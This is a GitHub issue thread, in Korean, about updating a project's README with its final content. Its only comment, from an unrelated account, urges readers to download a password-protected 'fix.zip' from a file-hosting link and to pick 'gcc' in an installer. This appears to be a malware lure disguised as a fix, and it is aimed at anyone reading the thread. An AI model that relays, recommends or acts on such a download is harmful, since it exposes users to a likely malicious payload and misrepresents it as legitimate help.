### ISSUE TITLE
[docs] README를 업데이트한다.

### ISSUE THREAD

**Issue by hellomatia** [woowa-techcamp-2024/Team4-BF2#147]
## ⚙ 어떤 기능인가요?

- 프로젝트 최종 내용을 정리하여 README를 업데이트 한다.

## 🔬 작업 상세 내용

- [ ] README 업데이트한다.

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
